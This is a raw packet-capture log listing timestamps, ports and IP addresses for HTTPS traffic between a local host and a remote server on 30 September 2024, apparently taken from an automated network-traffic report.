Sep 30, 2024 18:33:30.367845058 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:30.367883921 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:30.367904902 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:30.368520021 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:30.368558884 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:30.368592978 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:30.368607044 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:30.368628025 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:30.368648052 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:30.406867027 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:30.406903028 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:30.406960964 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:30.406991959 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:30.407012939 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:30.407248020 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:30.456605911 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:30.456664085 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:30.456739902 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:30.456784964 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:30.456808090 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:30.456840992 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:30.456902981 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:30.456908941 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:30.457066059 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:30.457444906 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:30.457485914 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:30.457531929 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:30.457537889 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:30.457587957 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:30.458300114 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:30.458359003 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:30.458389044 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:30.458394051 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:30.458417892 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:30.458439112 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:30.458961964 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:30.459003925 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:30.459100962 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:30.459106922 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:30.459182024 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:30.459676981 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:30.459733963 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:30.459769964 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:30.459781885 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:30.459801912 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:30.459816933 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:30.460005999 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:30.460047007 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:30.460094929 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:30.460105896 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:30.460128069 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:30.460155964 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:30.460798025 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:30.460838079 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:30.460864067 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:30.460879087 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:30.460896969 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:30.460912943 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:30.548858881 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:30.548896074 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:30.548979044 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:30.549012899 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:30.549056053 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:30.549170017 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:30.549192905 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:30.549253941 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:30.549258947 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:30.549290895 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:30.549896002 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:30.549913883 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:30.549971104 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:30.549977064 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:30.550024986 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:30.550462961 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:30.550481081 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:30.550533056 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:30.550539017 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:30.550574064 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:30.550585985 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:30.550949097 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:30.550961018 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:30.551033020 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:30.551039934 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:30.551074982 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:30.551647902 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:30.551670074 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:30.551707029 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:30.551714897 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:30.551743031 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:30.551760912 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:30.552107096 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:30.552125931 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:30.552181005 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:30.552186012 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:30.552216053 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:30.552643061 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:30.552663088 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:30.552736998 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:30.552742958 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:30.552779913 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:30.641979933 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:30.642009020 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:30.642072916 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:30.642107010 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:30.642128944 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:30.642141104 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:30.642546892 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:30.642569065 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:30.642606974 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:30.642611027 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:30.642648935 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:30.643338919 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:30.643362999 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:30.643394947 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:30.643399000 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:30.643435955 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:30.643450975 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:30.643733025 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:30.643805981 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:30.643810034 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:30.644335985 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:30.644351959 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:30.644387007 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:30.644392014 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:30.644416094 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:30.645111084 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:30.645126104 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:30.645175934 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:30.645180941 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:30.645203114 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:30.646028996 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:30.646049023 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:30.646102905 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:30.646115065 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:30.646133900 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:30.646611929 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:30.646627903 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:30.646667957 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:30.646672964 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:30.646698952 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:30.686446905 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:30.686470032 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:30.686528921 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:30.686547995 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:30.686587095 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:30.729713917 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:30.734622002 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:30.734632015 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:30.734661102 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:30.734700918 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:30.734715939 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:30.734747887 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:30.734762907 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:30.735455990 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:30.735471964 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:30.735548019 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:30.735555887 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:30.735660076 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:30.736567020 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:30.736582041 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:30.736629963 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:30.736637115 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:30.736668110 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:30.737386942 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:30.737401962 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:30.737473011 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:30.737479925 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:30.737521887 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:30.737973928 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:30.737989902 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:30.738051891 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:30.738058090 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:30.738090992 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:30.738692045 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:30.738707066 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:30.738775969 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:30.738789082 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:30.738831043 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:30.739041090 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:30.739054918 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:30.739123106 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:30.739129066 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:30.739177942 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:30.779025078 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:30.779045105 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:30.779105902 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:30.779123068 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:30.779162884 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:30.827636003 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:30.827717066 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:30.827744961 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:30.827819109 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:30.827861071 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:30.827886105 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:30.828258038 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:30.828305960 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:30.828345060 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:30.828383923 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:30.828407049 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:30.828466892 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:30.829277039 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:30.829332113 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:30.829350948 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:30.829365015 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:30.829405069 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:30.829405069 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:30.830120087 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:30.830159903 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:30.830209017 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:30.830221891 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:30.830255985 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:30.830349922 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:30.830585957 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:30.830656052 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:30.830686092 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:30.830698013 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:30.830751896 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:30.830751896 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:30.831404924 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:30.831449032 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:30.831475973 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:30.831481934 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:30.831521988 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:30.831537008 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:30.832238913 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:30.832283974 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:30.832310915 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:30.832315922 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:30.832345009 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:30.832359076 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:30.872473001 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:30.872503042 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:30.872590065 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:30.872622013 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:30.872658014 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:30.920582056 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:30.920643091 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:30.920696020 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:30.920773029 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:30.920811892 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:30.920921087 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:30.921195030 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:30.921235085 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:30.921264887 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:30.921278954 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:30.921305895 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:30.921325922 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:30.922795057 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:30.922813892 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:30.922858953 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:30.922872066 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:30.922898054 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:30.922915936 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:30.923624992 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:30.923664093 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:30.923692942 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:30.923706055 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:30.923727036 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:30.923772097 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:30.924422979 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:30.924463987 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:30.924501896 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:30.924514055 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:30.924539089 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:30.924599886 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:30.925789118 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:30.925829887 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:30.925853968 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:30.925865889 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:30.925916910 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:30.925916910 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:30.926419973 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:30.926460981 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:30.926496983 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:30.926508904 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:30.926552057 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:30.926573038 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:30.965114117 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:30.965167999 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:30.965220928 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:30.965269089 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:30.965311050 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:30.965353012 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:31.013145924 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:31.013194084 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:31.013257980 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:31.013312101 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:31.013345957 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:31.013421059 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:31.013791084 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:31.013844013 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:31.013886929 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:31.013891935 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:31.014003038 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:31.015448093 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:31.015487909 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:31.015861034 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:31.015870094 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:31.015913010 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:31.016010046 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:31.016072989 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:31.016088009 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:31.016094923 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:31.016140938 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:31.017162085 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:31.017221928 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:31.017265081 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:31.017271042 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:31.017316103 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:31.019047976 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:31.019085884 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:31.019112110 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:31.019121885 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:31.019172907 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:31.019493103 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:31.019534111 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:31.019556999 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:31.019567013 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:31.019598961 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:31.019612074 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:31.058381081 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:31.058439970 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:31.058479071 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:31.058499098 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:31.058535099 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:31.058546066 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:31.107868910 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:31.107916117 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:31.108014107 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:31.108041048 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:31.108063936 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:31.108093977 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:31.108109951 CEST	49701	443	192.168.2.7	188.114.96.3
